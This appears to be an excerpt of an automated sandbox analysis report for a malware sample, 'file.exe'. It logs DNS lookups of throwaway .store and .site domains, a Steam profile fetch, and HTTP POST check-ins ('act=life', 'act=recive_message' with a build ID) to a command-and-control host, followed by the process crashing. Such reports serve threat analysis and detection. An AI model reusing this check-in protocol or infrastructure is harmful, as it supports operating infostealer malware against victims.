Oct 13, 2024 17:46:13.157597065 CEST | 55704 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.168519974 CEST | 53 | 55704 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 17:46:13.171046972 CEST | 64781 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.180546045 CEST | 53 | 64781 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 17:46:13.182859898 CEST | 51538 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.200644970 CEST | 53 | 51538 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 17:46:13.202147007 CEST | 53860 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.213422060 CEST | 53 | 53860 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 17:46:13.214637995 CEST | 60932 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.223413944 CEST | 53 | 60932 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 17:46:13.225765944 CEST | 57019 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.235594034 CEST | 53 | 57019 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 17:46:13.239113092 CEST | 49938 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.245758057 CEST | 53 | 49938 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 17:46:14.641082048 CEST | 63472 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:14.649791956 CEST | 53 | 63472 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 13, 2024 17:46:12.993654966 CEST | 192.168.2.7 | 1.1.1.1 | 0x4e9f | Standard query (0) | clearancek.site | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.143968105 CEST | 192.168.2.7 | 1.1.1.1 | 0x4c7b | Standard query (0) | mobbipenju.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.157597065 CEST | 192.168.2.7 | 1.1.1.1 | 0xa62e | Standard query (0) | eaglepawnoy.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.171046972 CEST | 192.168.2.7 | 1.1.1.1 | 0xe46c | Standard query (0) | dissapoiznw.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.182859898 CEST | 192.168.2.7 | 1.1.1.1 | 0x5682 | Standard query (0) | studennotediw.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.202147007 CEST | 192.168.2.7 | 1.1.1.1 | 0xda86 | Standard query (0) | bathdoomgaz.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.214637995 CEST | 192.168.2.7 | 1.1.1.1 | 0x7a6e | Standard query (0) | spirittunek.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.225765944 CEST | 192.168.2.7 | 1.1.1.1 | 0x3bed | Standard query (0) | licendfilteo.site | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.239113092 CEST | 192.168.2.7 | 1.1.1.1 | 0xa77d | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:14.641082048 CEST | 192.168.2.7 | 1.1.1.1 | 0x4db9 | Standard query (0) | sergei-esenin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 13, 2024 17:46:13.137964964 CEST | 1.1.1.1 | 192.168.2.7 | 0x4e9f | Name error (3) | clearancek.site | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.154751062 CEST | 1.1.1.1 | 192.168.2.7 | 0x4c7b | Name error (3) | mobbipenju.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.168519974 CEST | 1.1.1.1 | 192.168.2.7 | 0xa62e | Name error (3) | eaglepawnoy.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.180546045 CEST | 1.1.1.1 | 192.168.2.7 | 0xe46c | Name error (3) | dissapoiznw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.200644970 CEST | 1.1.1.1 | 192.168.2.7 | 0x5682 | Name error (3) | studennotediw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.213422060 CEST | 1.1.1.1 | 192.168.2.7 | 0xda86 | Name error (3) | bathdoomgaz.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.223413944 CEST | 1.1.1.1 | 192.168.2.7 | 0x7a6e | Name error (3) | spirittunek.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.235594034 CEST | 1.1.1.1 | 192.168.2.7 | 0x3bed | Name error (3) | licendfilteo.site | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:13.245758057 CEST | 1.1.1.1 | 192.168.2.7 | 0xa77d | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:14.649791956 CEST | 1.1.1.1 | 192.168.2.7 | 0x4db9 | No error (0) | sergei-esenin.com | | 172.67.206.204 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 17:46:14.649791956 CEST | 1.1.1.1 | 192.168.2.7 | 0x4db9 | No error (0) | sergei-esenin.com | | 104.21.53.8 | A (IP address) | IN (0x0001) | false
                                                                • steamcommunity.com
                                                                • sergei-esenin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49709 | 104.102.49.254 | 443 | 7352 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 15:46:14 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-10-13 15:46:14 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sun, 13 Oct 2024 15:46:14 GMT
Content-Length: 34837
Connection: close
Set-Cookie: sessionid=c94cdce0b95ece23009d2eae; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-13 15:46:14 UTC | 14514 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-13 15:46:14 UTC | 16384 | IN | Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-13 15:46:14 UTC | 3768 | IN | Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-13 15:46:14 UTC | 171 | IN | Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                1 | 192.168.2.7 | 49714 | 172.67.206.204 | 443 | 7352 | C:\Users\user\Desktop\file.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-10-13 15:46:15 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: sergei-esenin.com
                                                                2024-10-13 15:46:15 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-10-13 15:46:15 UTC | 555 | IN | HTTP/1.1 200 OK
                                                                Date: Sun, 13 Oct 2024 15:46:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Frame-Options: SAMEORIGIN
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ebKHZLVH%2BBiaLdRLUe8B7gMBDIg1O7hrXX%2Biie0jYCuzegfbWWzOK5EYIcq%2BsyeiWB12dlMKObqu0Hmm2tFaoPiqGk4jwRKzo3%2F2IRPDLkzZKvaAByhqAymEoXXt3xGm3JWBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d20761cfefc8c27-EWR
                                                                2024-10-13 15:46:15 UTC814INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                2024-10-13 15:46:15 UTC1369INData Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27
                                                                Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
                                                                2024-10-13 15:46:15 UTC1369INData Raw: 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69
                                                                Data Ascii: agement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <i
                                                                2024-10-13 15:46:15 UTC889INData Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62
                                                                Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
                                                                2024-10-13 15:46:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                2 | 192.168.2.7 | 49719 | 172.67.206.204 | 443 | 7352 | C:\Users\user\Desktop\file.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-10-13 15:46:16 UTC | 354 | OUT | POST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cookie: __cf_mw_byp=cKYJNG4PUdZgy2T2WC.4u4JOPeXDHIGLF0EcZVHEveg-1728834375-0.0.1.1-/api
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 52
                                                                Host: sergei-esenin.com
                                                                2024-10-13 15:46:16 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                2024-10-13 15:46:16 UTC | 831 | IN | HTTP/1.1 200 OK
                                                                Date: Sun, 13 Oct 2024 15:46:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=k77go9c8npgvj0h1f33gsensl9; expires=Thu, 06 Feb 2025 09:32:55 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mFXD6ZAQU%2F4uPAOy4ePs58HTBYnoGgbX5O%2BnTcsXcgLEnWUsrLRxn%2F0wFJ1Fqz6cKjfw51SBuL%2BBdWJFyaW5AeirnSAH2lOVbpcbWqAm3HEpdq2Gk56%2FFlT0ccODmPmNZyPRow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d207622dc581a07-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-13 15:46:16 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-10-13 15:46:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Target ID: 0
                                                                Start time: 11:46:09
                                                                Start date: 13/10/2024
                                                                Path: C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit): true
                                                                Commandline: "C:\Users\user\Desktop\file.exe"
                                                                Imagebase: 0x6a0000
                                                                File size: 1'844'224 bytes
                                                                MD5 hash: FB08A9067FAE7BFD248416C863BD43D2
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: low
                                                                Has exited: true

                                                                Target ID: 5
                                                                Start time: 11:46:16
                                                                Start date: 13/10/2024
                                                                Path: C:\Windows\SysWOW64\WerFault.exe
                                                                Wow64 process (32bit): true
                                                                Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1920
                                                                Imagebase: 0xd00000
                                                                File size: 483'680 bytes
                                                                MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: high
                                                                Has exited: true

                                                                No disassembly